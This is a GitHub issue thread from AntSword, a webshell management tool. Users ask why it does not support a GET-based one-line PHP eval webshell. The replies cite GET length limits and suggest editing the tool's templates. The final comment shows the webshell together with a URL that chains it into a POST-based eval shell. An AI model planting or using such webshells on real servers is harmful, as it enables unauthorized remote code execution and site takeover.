AntSwordProject / antSword

中国蚁剑是一款跨平台的开源网站管理工具。AntSword is a cross-platform website management toolkit.
https://www.yuque.com/antswordproject/antsword
MIT License
3.62k stars 573 forks source link

为什么不支持$_GET类型的啊 #335

Open ufofly opened 1 year ago

ufofly commented 1 year ago

为什么不能使用<?php @eval($_GET[x]) ?>,了解到可以转换成post连接,为什么$_REQUEST也支持,不支持$_GET呢?

CrystalRays commented 1 year ago

get参数有长度限制

woshicym commented 1 year ago

愚蠢的决定

Medicean commented 1 year ago

为什么不能使用<?php @eval($_GET[x]) ?>,了解到可以转换成post连接,为什么$_REQUEST也支持,不支持$_GET呢?

如果你的环境不支持 POST 请求,仅支持 GET 请求的情况下,建议你自行修改 core 中的模版代码,将 $_POST 部分全部改为 $_GET,之后再修改 module/request 部分发包的代码,将 post 改为 get

123456789tx1234567876 commented 8 months ago

get有长度限制

b3r1ch commented 3 weeks ago
<?php @eval($_GET[x]) ?>

http://127.0.0.1/1.php?x=eval($_POST['x'])